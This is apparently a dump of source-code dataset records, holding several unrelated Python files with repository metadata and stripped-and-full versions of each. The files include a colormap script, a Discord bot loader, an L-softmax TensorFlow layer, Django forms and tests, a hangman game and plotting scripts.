# ehtplot is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ehtplot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ehtplot. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
from ehtplot.color.cmap import mergecmap
from ehtplot.color.ctab import _path, ext, get_ctab, save_ctab
save_cmap(mergecmap([{'name':'ehtblue', 'revert':True},
{'name':'ehtorange'}]), "ehtblueorange")
save_cmap(mergecmap([{'name':'ehtblue', 'revert':True},
{'name':'ehtviolet'}]), "ehtblueviolet")
| 37.090909 | 70 | 0.71732 | #!/usr/bin/env python3
#
# Copyright (C) 2018--2019 Chi-kwan Chan
# Copyright (C) 2018--2019 Steward Observatory
#
# This file is part of ehtplot.
#
# ehtplot is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ehtplot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ehtplot. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
from ehtplot.color.cmap import mergecmap
from ehtplot.color.ctab import _path, ext, get_ctab, save_ctab
def save_cmap(cm, name):
save_ctab(get_ctab(cm), _path+"/"+name+ext)
save_cmap(mergecmap([{'name':'ehtblue', 'revert':True},
{'name':'ehtorange'}]), "ehtblueorange")
save_cmap(mergecmap([{'name':'ehtblue', 'revert':True},
{'name':'ehtviolet'}]), "ehtblueviolet")
| 51 | 0 | 23 |
4b966c0ae593681a28d86b6768f14fd6e0a06939 | 894 | py | Python | bot.py | ImGabe/vending-machine | bdb49968f7d0395b1771f19c5254afb9d948f42c | [
"MIT"
] | null | null | null | bot.py | ImGabe/vending-machine | bdb49968f7d0395b1771f19c5254afb9d948f42c | [
"MIT"
] | null | null | null | bot.py | ImGabe/vending-machine | bdb49968f7d0395b1771f19c5254afb9d948f42c | [
"MIT"
] | 1 | 2020-11-20T15:25:26.000Z | 2020-11-20T15:25:26.000Z | from pathlib import Path
import configparser
import json
import discord
from app import client, config
@client.event
def load_extensions(cogs: str) -> None:
'''
Loads all extensions recursively.\n
Params:
cogs: str
Relative path to cogs dir.
'''
for extension in Path(cogs).rglob('*.py'):
extension = '.'.join(extension.parts)[:-3]
try:
client.load_extension(extension)
print(f'{extension} has been loaded.')
except Exception as e:
print(f'{extension} could not be loaded: {e}')
if __name__ == '__main__':
load_extensions(config['DEFAULT']['COG_DIR'])
client.run(config['CLIENT']['TOKEN'])
| 22.35 | 60 | 0.62528 | from pathlib import Path
import configparser
import json
import discord
from app import client, config
@client.event
async def on_ready():
await client.change_presence(
status=config['CLIENT']['STATUS'],
activity=discord.Game(config['CLIENT']['ACTIVITY']))
print('Up and running!')
def load_extensions(cogs: str) -> None:
'''
Loads all extensions recursively.\n
Params:
cogs: str
Relative path to cogs dir.
'''
for extension in Path(cogs).rglob('*.py'):
extension = '.'.join(extension.parts)[:-3]
try:
client.load_extension(extension)
print(f'{extension} has been loaded.')
except Exception as e:
print(f'{extension} could not be loaded: {e}')
if __name__ == '__main__':
load_extensions(config['DEFAULT']['COG_DIR'])
client.run(config['CLIENT']['TOKEN'])
| 168 | 0 | 22 |
671214d2338ab823f014d1f4f04fcba09906319f | 564 | py | Python | examples/tools/davidson_eigh.py | Warlocat/pyscf | 94c21e2e9745800c7efc7256de0d628fc60afc36 | [
"Apache-2.0"
] | 2 | 2019-05-28T05:25:56.000Z | 2019-11-09T02:16:43.000Z | examples/tools/davidson_eigh.py | lzypotato/pyscf | 94c21e2e9745800c7efc7256de0d628fc60afc36 | [
"Apache-2.0"
] | null | null | null | examples/tools/davidson_eigh.py | lzypotato/pyscf | 94c21e2e9745800c7efc7256de0d628fc60afc36 | [
"Apache-2.0"
] | 1 | 2019-11-09T02:13:16.000Z | 2019-11-09T02:13:16.000Z | #!/usr/bin/env python
'''
Calling davidson solver for the lowest eigenvalues of a Hermitian matrix
'''
import numpy
from pyscf import lib
n = 100
a = numpy.random.rand(n,n)
a = a + a.T
# Define the matrix-vector operation
# Define the preconditioner. It can be just the diagonal elements of the
# matrix.
precond = a.diagonal()
# Define the initial guess
x_init = numpy.zeros(n)
x_init[0] = 1
e, c = lib.eigh(matvec, x_init, precond, nroots=4, max_cycle=1000, verbose=5)
print('Eigenvalues', e)
| 20.142857 | 78 | 0.677305 | #!/usr/bin/env python
'''
Calling davidson solver for the lowest eigenvalues of a Hermitian matrix
'''
import numpy
from pyscf import lib
n = 100
a = numpy.random.rand(n,n)
a = a + a.T
# Define the matrix-vector operation
def matvec(x):
return a.dot(x)
# Define the preconditioner. It can be just the diagonal elements of the
# matrix.
precond = a.diagonal()
# Define the initial guess
x_init = numpy.zeros(n)
x_init[0] = 1
e, c = lib.eigh(matvec, x_init, precond, nroots=4, max_cycle=1000, verbose=5)
print('Eigenvalues', e)
| 14 | 0 | 23 |
3d79bf9dde091d861b40e8d30fad0af92b14e60d | 6,033 | py | Python | L_softmax/l_softmax.py | githubhjx/Deep-Learning- | 5a22fb5696d930ed334aa1cbf2b213956b1c7026 | [
"Apache-2.0"
] | null | null | null | L_softmax/l_softmax.py | githubhjx/Deep-Learning- | 5a22fb5696d930ed334aa1cbf2b213956b1c7026 | [
"Apache-2.0"
] | null | null | null | L_softmax/l_softmax.py | githubhjx/Deep-Learning- | 5a22fb5696d930ed334aa1cbf2b213956b1c7026 | [
"Apache-2.0"
] | null | null | null | import numpy as np
import math
import uuid
import tensorflow as tf
margin = 4
beta = 100
scale = 0.99
beta_min = 0
eps = 0
c_map = []
k_map = []
c_m_n = lambda m, n: math.factorial(n) / math.factorial(m) / math.factorial(n - m)
for i in range(margin + 1):
c_map.append(c_m_n(i, margin))
k_map.append(math.cos(i * math.pi / margin))
def find_k(cos_t):
'''find k for cos(theta)
'''
# for numeric issue
eps = 1e-5
le = lambda x, y: x < y or abs(x - y) < eps
for i in range(margin):
if le(k_map[i + 1], cos_t) and le(cos_t, k_map[i]):
return i
raise ValueError('can not find k for cos_t = %f' % cos_t)
def calc_cos_mt(cos_t):
'''calculate cos(m*theta)
'''
cos_mt = 0
sin2_t = 1 - cos_t * cos_t
flag = -1
for p in range(margin // 2 + 1):
flag *= -1
cos_mt += flag * c_map[2*p] * pow(cos_t, margin-2*p) * pow(sin2_t, p)
return cos_mt
| 37.943396 | 116 | 0.532405 | import numpy as np
import math
import uuid
import tensorflow as tf
margin = 4
beta = 100
scale = 0.99
beta_min = 0
eps = 0
c_map = []
k_map = []
c_m_n = lambda m, n: math.factorial(n) / math.factorial(m) / math.factorial(n - m)
for i in range(margin + 1):
c_map.append(c_m_n(i, margin))
k_map.append(math.cos(i * math.pi / margin))
def find_k(cos_t):
'''find k for cos(theta)
'''
# for numeric issue
eps = 1e-5
le = lambda x, y: x < y or abs(x - y) < eps
for i in range(margin):
if le(k_map[i + 1], cos_t) and le(cos_t, k_map[i]):
return i
raise ValueError('can not find k for cos_t = %f' % cos_t)
def find_k_vector(cos_t_vec):
k_val = []
for i in range(cos_t_vec.shape[0]):
try:
k_val.append(find_k(cos_t_vec[i]))
except ValueError:
print(cos_t_vec)
return k_val
def calc_cos_mt(cos_t):
'''calculate cos(m*theta)
'''
cos_mt = 0
sin2_t = 1 - cos_t * cos_t
flag = -1
for p in range(margin // 2 + 1):
flag *= -1
cos_mt += flag * c_map[2*p] * pow(cos_t, margin-2*p) * pow(sin2_t, p)
return cos_mt
def calc_cos_mt_vector(cos_t_vector):
cos_mt_val = []
for i in range(cos_t_vector.shape[0]):
cos_mt_val.append(calc_cos_mt(cos_t_vector[i]))
return cos_mt_val
def lsoftmax(x, weights, labels):
def _lsoftmax(net_val, weights, labels):
global beta, scale
normalize_net = np.linalg.norm(net_val, axis=1).reshape([net_val.shape[0], 1])
normalize_weights = np.linalg.norm(weights, axis=0).reshape([-1, weights.shape[1]])
normalize_val = normalize_net * normalize_weights
indexes = np.arange(net_val.shape[0])
labels = labels.reshape((-1,))
normalize_val_target = normalize_val[indexes, labels]
logit = np.dot(net_val, weights)
cos_t_target = logit[indexes, labels] / (normalize_val_target + eps)
k_val = np.array(find_k_vector(cos_t_target))
cos_mt_val = np.array(calc_cos_mt_vector(cos_t_target))
logit_output_cos = np.power(-1, k_val) * cos_mt_val - 2 * k_val
logit_output = logit_output_cos * normalize_val_target
logit_output_beta = (logit_output + beta * logit[indexes, labels]) / (1 + beta)
logit[indexes, labels] = logit_output_beta
return logit
def _lsoftmax_grad(x, w, label, grad):
global beta, scale, beta_min
# original without lsoftmax
w_grad = x.T.dot(grad) # 2, 10
x_grad = grad.dot(w.T) # 2, 2
n = label.shape[0]
m = w.shape[1]
feature_dim = w.shape[0]
cos_t = np.zeros(n, dtype=np.float32)
cos_mt = np.zeros(n, dtype=np.float32)
sin2_t = np.zeros(n, dtype=np.float32)
fo = np.zeros(n, dtype=np.float32)
k = np.zeros(n, dtype=np.int32)
x_norm = np.linalg.norm(x, axis=1)
w_norm = np.linalg.norm(w, axis=0)
w_tmp = w.T
for i in range(n):
yi = int(label[i])
f = w_tmp[yi].dot(x[i])
cos_t[i] = f / (w_norm[yi] * x_norm[i])
k[i] = find_k(cos_t[i])
cos_mt[i] = calc_cos_mt(cos_t[i])
sin2_t[i] = 1 - cos_t[i]*cos_t[i]
fo[i] = f
# gradient w.r.t. x_i
for i in range(n):
# df / dx at x = x_i, w = w_yi
j = yi = int(label[i])
dcos_dx = w_tmp[yi] / (w_norm[yi]*x_norm[i]) - x[i] * fo[i] / (w_norm[yi]*pow(x_norm[i], 3))
dsin2_dx = -2 * cos_t[i] * dcos_dx
dcosm_dx = margin*pow(cos_t[i], margin-1) * dcos_dx # p = 0
flag = 1
for p in range(1, margin//2+1):
flag *= -1
dcosm_dx += flag * c_map[2*p] * (p*pow(cos_t[i], margin-2*p)*pow(sin2_t[i], p-1)*dsin2_dx +
(margin-2*p)*pow(cos_t[i], margin-2*p-1)*pow(sin2_t[i], p)*dcos_dx)
df_dx = (pow(-1, k[i]) * cos_mt[i] - 2*k[i]) * w_norm[yi] / x_norm[i] * x[i] + \
pow(-1, k[i]) * w_norm[yi] * x_norm[i] * dcosm_dx
alpha = 1 / (1 + beta)
x_grad[i] += alpha * grad[i, yi] * (df_dx - w_tmp[yi])
# gradient w.r.t. w_j
for j in range(m):
dw = np.zeros(feature_dim, dtype=np.float32)
for i in range(n):
yi = int(label[i])
if yi == j:
# df / dw at x = x_i, w = w_yi and yi == j
dcos_dw = x[i] / (w_norm[yi]*x_norm[i]) - w_tmp[yi] * fo[i] / (x_norm[i]*pow(w_norm[yi], 3))
dsin2_dw = -2 * cos_t[i] * dcos_dw
dcosm_dw = margin*pow(cos_t[i], margin-1) * dcos_dw # p = 0
flag = 1
for p in range(1, margin//2+1):
flag *= -1
dcosm_dw += flag * c_map[2*p] * (p*pow(cos_t[i], margin-2*p)*pow(sin2_t[i], p-1)*dsin2_dw +
(margin-2*p)*pow(cos_t[i], margin-2*p-1)*pow(sin2_t[i], p)*dcos_dw)
df_dw_j = (pow(-1, k[i]) * cos_mt[i] - 2*k[i]) * x_norm[i] / w_norm[yi] * w_tmp[yi] + \
pow(-1, k[i]) * w_norm[yi] * x_norm[i] * dcosm_dw
dw += grad[i, yi] * (df_dw_j - x[i])
alpha = 1 / (1 + beta)
w_grad[:, j] += alpha * dw
beta *= scale
beta = max(beta, beta_min)
return x_grad, w_grad
def _lsoftmax_grad_op(op, grad):
x = op.inputs[0]
weights = op.inputs[1]
labels = op.inputs[2]
x_grad, w_grad = tf.py_func(_lsoftmax_grad, [x, weights, labels, grad], [tf.float32, tf.float32])
return x_grad, w_grad, labels
grad_name = 'lsoftmax_' + str(uuid.uuid4())
tf.RegisterGradient(grad_name)(_lsoftmax_grad_op)
g = tf.get_default_graph()
with g.gradient_override_map({"PyFunc": grad_name}):
output = tf.py_func(_lsoftmax, [x, weights, labels], tf.float32)
return output
| 5,028 | 0 | 69 |
f114e6783c5c73f9ca3b2209f92b1d2dec1ed046 | 701 | py | Python | pytorch_nst/config.py | tomsitter/pytorch-style-transfer-nbdev | 71ebd7a2f097ec94eac636b4e0c52a39fb66bdc6 | [
"Apache-2.0"
] | null | null | null | pytorch_nst/config.py | tomsitter/pytorch-style-transfer-nbdev | 71ebd7a2f097ec94eac636b4e0c52a39fb66bdc6 | [
"Apache-2.0"
] | 5 | 2021-09-08T02:55:55.000Z | 2022-03-12T01:00:56.000Z | pytorch_nst/config.py | tomsitter/pytorch-style-transfer-nbdev | 71ebd7a2f097ec94eac636b4e0c52a39fb66bdc6 | [
"Apache-2.0"
] | null | null | null | # AUTOGENERATED! DO NOT EDIT! File to edit: 01_config.ipynb (unless otherwise specified).
__all__ = ['device', 'imsize', 'normalization_mean', 'normalization_std', 'content_layers_default',
'style_layers_default']
# Cell
import torch
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
imsize = 512 if torch.cuda.is_available() else 128
# VGG network was trained on normalized images, so must do the same to ours
normalization_mean = torch.tensor([[0.485, 0.456, 0.406]]).to(device)
normalization_std = torch.tensor([[0.229, 0.224, 0.225]]).to(device)
content_layers_default = ['conv4_2']
style_layers_default = ['conv1_1', 'conv2_1', 'conv3_1', 'conv4_1', 'conv5_1'] | 41.235294 | 99 | 0.728959 | # AUTOGENERATED! DO NOT EDIT! File to edit: 01_config.ipynb (unless otherwise specified).
__all__ = ['device', 'imsize', 'normalization_mean', 'normalization_std', 'content_layers_default',
'style_layers_default']
# Cell
import torch
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
imsize = 512 if torch.cuda.is_available() else 128
# VGG network was trained on normalized images, so must do the same to ours
normalization_mean = torch.tensor([[0.485, 0.456, 0.406]]).to(device)
normalization_std = torch.tensor([[0.229, 0.224, 0.225]]).to(device)
content_layers_default = ['conv4_2']
style_layers_default = ['conv1_1', 'conv2_1', 'conv3_1', 'conv4_1', 'conv5_1'] | 0 | 0 | 0 |
07a62f6d7ebf94a24a8085c3c1373df54bd21409 | 874 | py | Python | geninfo/info/forms.py | genomika/geninfo | 0604bf65c57847500db84523a2c8707a12f7a5a8 | [
"MIT"
] | 3 | 2022-02-15T15:33:44.000Z | 2022-02-16T15:31:28.000Z | geninfo/info/forms.py | genomika/geninfo | 0604bf65c57847500db84523a2c8707a12f7a5a8 | [
"MIT"
] | null | null | null | geninfo/info/forms.py | genomika/geninfo | 0604bf65c57847500db84523a2c8707a12f7a5a8 | [
"MIT"
] | null | null | null | from django import forms
# from django.forms import ModelChoiceField
from .models import Incident
| 30.137931 | 89 | 0.602975 | from django import forms
# from django.forms import ModelChoiceField
from .models import Incident
class IncidentForm(forms.ModelForm):
class Meta:
model = Incident
fields = "__all__"
def clean(self):
status_type = self.cleaned_data["status_incident"]
end_date = self.cleaned_data["finish_date_incidente"]
# reports = ModelChoiceField(queryset=None, label='reports', required=False)
if status_type == "rs":
if not end_date:
raise forms.ValidationError(
"Informe a data de conclusão do Incidente! "
)
# if affected.count() == 3:
# # print(reports.count(), "<<")
# print(reports.to_field_name)
# print(dir(reports))
# raise forms.ValidationError('Mude o status do incidente para "Em Análise"')
| 643 | 110 | 23 |
439fcd1f7d1571e2b523084ad698125578bf666a | 530 | py | Python | tests/test_models.py | codingjoe/django-mail-auth | 21b102e511bd801f04fbb2328d846e625dac7f60 | [
"MIT"
] | 39 | 2019-04-12T22:44:55.000Z | 2021-12-12T06:03:47.000Z | tests/test_models.py | codingjoe/django-mail-auth | 21b102e511bd801f04fbb2328d846e625dac7f60 | [
"MIT"
] | 49 | 2019-05-28T10:58:51.000Z | 2022-03-29T00:33:18.000Z | tests/test_models.py | codingjoe/django-mail-auth | 21b102e511bd801f04fbb2328d846e625dac7f60 | [
"MIT"
] | 6 | 2019-08-07T06:16:38.000Z | 2022-02-25T12:14:13.000Z | import pytest
from django.db import IntegrityError
from mailauth.contrib.user import models
try:
import psycopg2
except ImportError:
psycopg2 = None
postgres_only = pytest.mark.skipif(
psycopg2 is None, reason="at least mymodule-1.1 required"
)
| 23.043478 | 72 | 0.739623 | import pytest
from django.db import IntegrityError
from mailauth.contrib.user import models
try:
import psycopg2
except ImportError:
psycopg2 = None
postgres_only = pytest.mark.skipif(
psycopg2 is None, reason="at least mymodule-1.1 required"
)
class TestEmailUser:
@postgres_only
def test_email__ci_unique(self, db):
models.EmailUser.objects.create_user("IronMan@avengers.com")
with pytest.raises(IntegrityError):
models.EmailUser.objects.create_user("ironman@avengers.com")
| 201 | 44 | 23 |
906bf78de9d6afaf9d670aa83f0803631f27085d | 2,209 | py | Python | model.py | LucijanZgonik/Vislice | e82614929927438a13df349afedc39a4b19eb290 | [
"MIT"
] | null | null | null | model.py | LucijanZgonik/Vislice | e82614929927438a13df349afedc39a4b19eb290 | [
"MIT"
] | null | null | null | model.py | LucijanZgonik/Vislice | e82614929927438a13df349afedc39a4b19eb290 | [
"MIT"
] | null | null | null | STEVILO_DOVOLJENIH_NAPAK = 10
PRAVILNA_CRKA = '+'
NAPACNA_CRKA = '-'
PONOVLJENA_CRKA = 'o'
ZMAGA = 'W'
PORAZ = 'L'
bazen_besed = []
with open ("Vislice/besede.txt") as datoteka_bazena:
for beseda in datoteka_bazena:
bazen_besed.append(beseda.strip().lower())
import random
| 21.240385 | 63 | 0.466274 | STEVILO_DOVOLJENIH_NAPAK = 10
PRAVILNA_CRKA = '+'
NAPACNA_CRKA = '-'
PONOVLJENA_CRKA = 'o'
ZMAGA = 'W'
PORAZ = 'L'
class Igra:
def __init__(self,geslo,crke=None):
self.geslo = geslo
if crke is None:
self.crke = []
else:
self.crke = [c.lower() for c in crke]
def napacne_crke(self):
nap = ''
for x in self.crke:
if x in self.geslo:
nap = nap
else:
nap = nap + x
return nap
def pravilne_crke(self):
prav = ''
for x in self.crke:
if x in self.geslo:
prav = prav + x
else:
prav = prav
return prav
def stevilo_napak(self):
return len(self.napacne_crke())
def zmaga(self):
for c in self.geslo:
if c not in self.crke:
return False
else:
return True
def poraz(self):
return self.stevilo_napak() > STEVILO_DOVOLJENIH_NAPAK
def pravilni_del_gesla(self):
pr = ''
for x in self.geslo:
if x in self.crke:
pr = pr + x
else:
pr = pr + '_'
return pr
def nepravilni_ugibi(self):
return " ".join(self.napacne_crke())
def ugibaj(self,crka):
crka = crka.lower()
if crka in self.crke:
return PONOVLJENA_CRKA
self.crke.append(crka)
if crka in self.geslo:
if self.zmaga():
return ZMAGA
else:
return PRAVILNA_CRKA
else:
if self.poraz():
return PORAZ
else:
return NAPACNA_CRKA
bazen_besed = []
with open ("Vislice/besede.txt") as datoteka_bazena:
for beseda in datoteka_bazena:
bazen_besed.append(beseda.strip().lower())
import random
def nova_igra():
nakljucna_beseda = random.choice(bazen_besed)
return Igra(nakljucna_beseda)
| 1,508 | -10 | 333 |
172ceb42551e8d4b82c6d6256ce9ad79098808ef | 830 | py | Python | Python/ex39.py | Anderson0312/Python | 1fd225378c55309640d584a4894393f7c40dc9ed | [
"MIT"
] | 1 | 2022-02-01T17:59:50.000Z | 2022-02-01T17:59:50.000Z | Python/ex39.py | Anderson0312/Python | 1fd225378c55309640d584a4894393f7c40dc9ed | [
"MIT"
] | null | null | null | Python/ex39.py | Anderson0312/Python | 1fd225378c55309640d584a4894393f7c40dc9ed | [
"MIT"
] | null | null | null | print('-=' * 15)
print('{:^30}'.format('LOJA SUPER BARATÃO'))
print('-=' * 15)
total = cont1000 = menor = cont = 0
nomemenor = ''
while True:
nomeP = str(input('Nome do produto: '))
preco = float(input('Preço: R$ '))
cont += 1
soun = ' '
print('-' * 30)
while soun not in 'SN':
soun = str(input('Quer Continuar? [S/N]')).strip()[0].upper()
print('-' * 30)
total += preco
if preco >= 1000:
cont1000 += 1
if cont == 1:
menor = preco
nomemenor = nomeP
else:
if preco < menor:
menor = preco
nomemenor = nomeP
if soun == 'N':
break
print(f'O total de compra foi R${total:.2f}')
print(f'Temos {cont1000} produtos custando mais de R$ 1000.00')
print(f'O produto mais barato foi {nomemenor} que custa {menor:.2f}') | 28.62069 | 69 | 0.543373 | print('-=' * 15)
print('{:^30}'.format('LOJA SUPER BARATÃO'))
print('-=' * 15)
total = cont1000 = menor = cont = 0
nomemenor = ''
while True:
nomeP = str(input('Nome do produto: '))
preco = float(input('Preço: R$ '))
cont += 1
soun = ' '
print('-' * 30)
while soun not in 'SN':
soun = str(input('Quer Continuar? [S/N]')).strip()[0].upper()
print('-' * 30)
total += preco
if preco >= 1000:
cont1000 += 1
if cont == 1:
menor = preco
nomemenor = nomeP
else:
if preco < menor:
menor = preco
nomemenor = nomeP
if soun == 'N':
break
print(f'O total de compra foi R${total:.2f}')
print(f'Temos {cont1000} produtos custando mais de R$ 1000.00')
print(f'O produto mais barato foi {nomemenor} que custa {menor:.2f}') | 0 | 0 | 0 |
7da5f84d5906da12c0ab908da3370cab26295fcb | 3,525 | py | Python | scratch/regression/rolling_validation/plot_losses.py | finn-dodgson/DeepHalos | 86e0ac6c24ac97a0a2a0a60a7ea3721a04bd050c | [
"MIT"
] | 2 | 2021-07-26T10:56:33.000Z | 2021-12-20T17:30:53.000Z | scratch/regression/rolling_validation/plot_losses.py | finn-dodgson/DeepHalos | 86e0ac6c24ac97a0a2a0a60a7ea3721a04bd050c | [
"MIT"
] | 1 | 2021-11-25T21:01:19.000Z | 2021-12-05T01:40:53.000Z | scratch/regression/rolling_validation/plot_losses.py | finn-dodgson/DeepHalos | 86e0ac6c24ac97a0a2a0a60a7ea3721a04bd050c | [
"MIT"
] | 1 | 2021-11-27T02:35:10.000Z | 2021-11-27T02:35:10.000Z | import numpy as np
import matplotlib.pyplot as plt
paths = '/Users/lls/Documents/deep_halos_files/regression/rolling_val/'
paths_all = [paths + '0dropout/', paths + '0.1dropout/', paths + '0.2dropout/', paths + '0.3dropout/',
paths + 'no_sim3/']
dropout_pc = ["0", "10", "20", "30", "40"]
f, axes = plt.subplots(3, 2, sharex=True, figsize=(10, 7))
axes = np.concatenate(axes)
n = 5
for i in range(6):
ax = axes[i]
if i == 5:
ax.plot([], [], label="training", color="C0")
ax.plot([], [], label="validation", color="C1")
ax.plot([], [], label="training (end of epoch + no dropout)",
color="k")
ax.plot([], [], color="C2",
label="sim-7 (not used during training)")
ax.plot([], [], label="all particles", color="dimgrey", ls="-", lw=2)
ax.plot([], [], label="particles with $\log(M) \leq 13.5$", color="dimgrey", ls="--", lw=2)
ax.legend(loc="center", fontsize=14)
ax.axis('off')
else:
if i == 0:
ax.set_yscale("log")
else:
ax.set_ylim(0.01, 0.58)
path = paths_all[i]
tr = np.loadtxt(path + "training.log", delimiter=",", skiprows=1)
loss_training_sim7 = np.load(path + "loss_training_and_sim7.npy")
ax.plot(tr[n:, 0], tr[n:, 1], label="training", color="C0")
ax.plot(tr[n:, 0], tr[n:, 2], label="validation", color="C1")
ax.plot(loss_training_sim7[:, 0], loss_training_sim7[:, 1], label="training (end of epoch + no dropout)",
color="k")
ax.scatter(loss_training_sim7[:,0], loss_training_sim7[:,1], color="k", s=5)
ax.plot(loss_training_sim7[:, 0], loss_training_sim7[:, 2], color="C2",
label="sim-7 (not used during training)")
ax.scatter(loss_training_sim7[:,0], loss_training_sim7[:,2], color="C2", s=5)
if i == 2:
ax.set_ylabel("Loss")
if i == 4:
ax.set_xlabel("Epoch")
if i in [2, 3, 4]:
ax.text(0.7, 0.9, dropout_pc[i] + r"$\%$ dropout", ha='center', va='center', transform=ax.transAxes)
else:
ax.text(0.7, 0.7, dropout_pc[i] + r"$\%$ dropout", ha='center', va='center', transform=ax.transAxes)
for i in range(6):
ax = axes[i]
if i == 5:
pass
else:
if i == 0:
ax.set_yscale("log")
elif i in [3, 4]:
ax.set_ylim(0.12, 0.5)
else:
ax.set_ylim(0.01, 0.58)
path = paths_all[i]
tr = np.loadtxt(path + "training.log", delimiter=",", skiprows=1)
# loss_training_sim7 = np.load(path + "loss_training_and_sim7.npy")
loss_training_sim7_above_135 = np.load(path + "loss_training_sim7_validaton_above_135Msol.npy")
ax.plot(loss_training_sim7_above_135[:, 0], loss_training_sim7_above_135[:, 3], label="validation", color="C1", ls="--")
ax.plot(loss_training_sim7_above_135[:, 0], loss_training_sim7_above_135[:, 1], label="training (end of epoch + no dropout)",
color="k", ls="--")
ax.scatter(loss_training_sim7_above_135[:,0], loss_training_sim7_above_135[:,1], color="k", s=5)
ax.plot(loss_training_sim7_above_135[:, 0], loss_training_sim7_above_135[:, 2], color="C2",
label="sim-7 (not used during training)", ls="--")
ax.scatter(loss_training_sim7_above_135[:,0], loss_training_sim7_above_135[:,2], color="C2", s=5)
plt.subplots_adjust(wspace=0.15, hspace=0.05)
plt.savefig(paths + '')
| 40.517241 | 133 | 0.571348 | import numpy as np
import matplotlib.pyplot as plt
paths = '/Users/lls/Documents/deep_halos_files/regression/rolling_val/'
paths_all = [paths + '0dropout/', paths + '0.1dropout/', paths + '0.2dropout/', paths + '0.3dropout/',
paths + 'no_sim3/']
dropout_pc = ["0", "10", "20", "30", "40"]
f, axes = plt.subplots(3, 2, sharex=True, figsize=(10, 7))
axes = np.concatenate(axes)
n = 5
for i in range(6):
ax = axes[i]
if i == 5:
ax.plot([], [], label="training", color="C0")
ax.plot([], [], label="validation", color="C1")
ax.plot([], [], label="training (end of epoch + no dropout)",
color="k")
ax.plot([], [], color="C2",
label="sim-7 (not used during training)")
ax.plot([], [], label="all particles", color="dimgrey", ls="-", lw=2)
ax.plot([], [], label="particles with $\log(M) \leq 13.5$", color="dimgrey", ls="--", lw=2)
ax.legend(loc="center", fontsize=14)
ax.axis('off')
else:
if i == 0:
ax.set_yscale("log")
else:
ax.set_ylim(0.01, 0.58)
path = paths_all[i]
tr = np.loadtxt(path + "training.log", delimiter=",", skiprows=1)
loss_training_sim7 = np.load(path + "loss_training_and_sim7.npy")
ax.plot(tr[n:, 0], tr[n:, 1], label="training", color="C0")
ax.plot(tr[n:, 0], tr[n:, 2], label="validation", color="C1")
ax.plot(loss_training_sim7[:, 0], loss_training_sim7[:, 1], label="training (end of epoch + no dropout)",
color="k")
ax.scatter(loss_training_sim7[:,0], loss_training_sim7[:,1], color="k", s=5)
ax.plot(loss_training_sim7[:, 0], loss_training_sim7[:, 2], color="C2",
label="sim-7 (not used during training)")
ax.scatter(loss_training_sim7[:,0], loss_training_sim7[:,2], color="C2", s=5)
if i == 2:
ax.set_ylabel("Loss")
if i == 4:
ax.set_xlabel("Epoch")
if i in [2, 3, 4]:
ax.text(0.7, 0.9, dropout_pc[i] + r"$\%$ dropout", ha='center', va='center', transform=ax.transAxes)
else:
ax.text(0.7, 0.7, dropout_pc[i] + r"$\%$ dropout", ha='center', va='center', transform=ax.transAxes)
for i in range(6):
ax = axes[i]
if i == 5:
pass
else:
if i == 0:
ax.set_yscale("log")
elif i in [3, 4]:
ax.set_ylim(0.12, 0.5)
else:
ax.set_ylim(0.01, 0.58)
path = paths_all[i]
tr = np.loadtxt(path + "training.log", delimiter=",", skiprows=1)
# loss_training_sim7 = np.load(path + "loss_training_and_sim7.npy")
loss_training_sim7_above_135 = np.load(path + "loss_training_sim7_validaton_above_135Msol.npy")
ax.plot(loss_training_sim7_above_135[:, 0], loss_training_sim7_above_135[:, 3], label="validation", color="C1", ls="--")
ax.plot(loss_training_sim7_above_135[:, 0], loss_training_sim7_above_135[:, 1], label="training (end of epoch + no dropout)",
color="k", ls="--")
ax.scatter(loss_training_sim7_above_135[:,0], loss_training_sim7_above_135[:,1], color="k", s=5)
ax.plot(loss_training_sim7_above_135[:, 0], loss_training_sim7_above_135[:, 2], color="C2",
label="sim-7 (not used during training)", ls="--")
ax.scatter(loss_training_sim7_above_135[:,0], loss_training_sim7_above_135[:,2], color="C2", s=5)
plt.subplots_adjust(wspace=0.15, hspace=0.05)
plt.savefig(paths + '')
| 0 | 0 | 0 |
48fdf11a4bd8b2ba7b22bc93b7ceb1470082f2cd | 5,618 | py | Python | ParticleField.py | l3alr0g/Hull-breach-analysis | 5128f6feeeb6b85bcc469e452ce904736e857839 | [
"MIT"
] | 3 | 2020-01-09T19:40:05.000Z | 2021-04-24T06:47:27.000Z | ParticleField.py | l3alr0g/Hull-breach-tracking | 7ce34488ec95f93f0afb571731757a1ce569673e | [
"MIT"
] | null | null | null | ParticleField.py | l3alr0g/Hull-breach-tracking | 7ce34488ec95f93f0afb571731757a1ce569673e | [
"MIT"
] | null | null | null | from panda3d.core import * # needs to be improved later on (maybe)
from ProceduralGen import *
from copy import deepcopy
from physX import engine, PhysXNode, LinArrayFormat, ArrayLinFormat
from NodeStates import State
| 48.017094 | 166 | 0.55429 | from panda3d.core import * # needs to be improved later on (maybe)
from ProceduralGen import *
from copy import deepcopy
from physX import engine, PhysXNode, LinArrayFormat, ArrayLinFormat
from NodeStates import State
class ParticleMesh:
def __init__(self,l,w,Vl,Vw,extraArgs):
'''
ParticleMesh
===
this is a particle array, it reacts to mechanical stresses.
Arguments needed: lenght and width in 3d units, length and width in amount of vertices (the four must be ints).
'''
# core variables
self.size = (Vl,Vw)
self.surface = RectangleSurface(l,w,Vl,Vw)
PosState = LinArrayFormat(self.surface.GetPosData(), (Vl, Vw))
self.Nodes = [[PhysXNode(j,i,PosState[j][i],1,"free") for i in range(Vw)] for j in range(Vl)] # Attention ! Erreur d'indices possible
''' # useless, this chunk of code will be deleted in a few hours, if you see this years later, this project might be dead
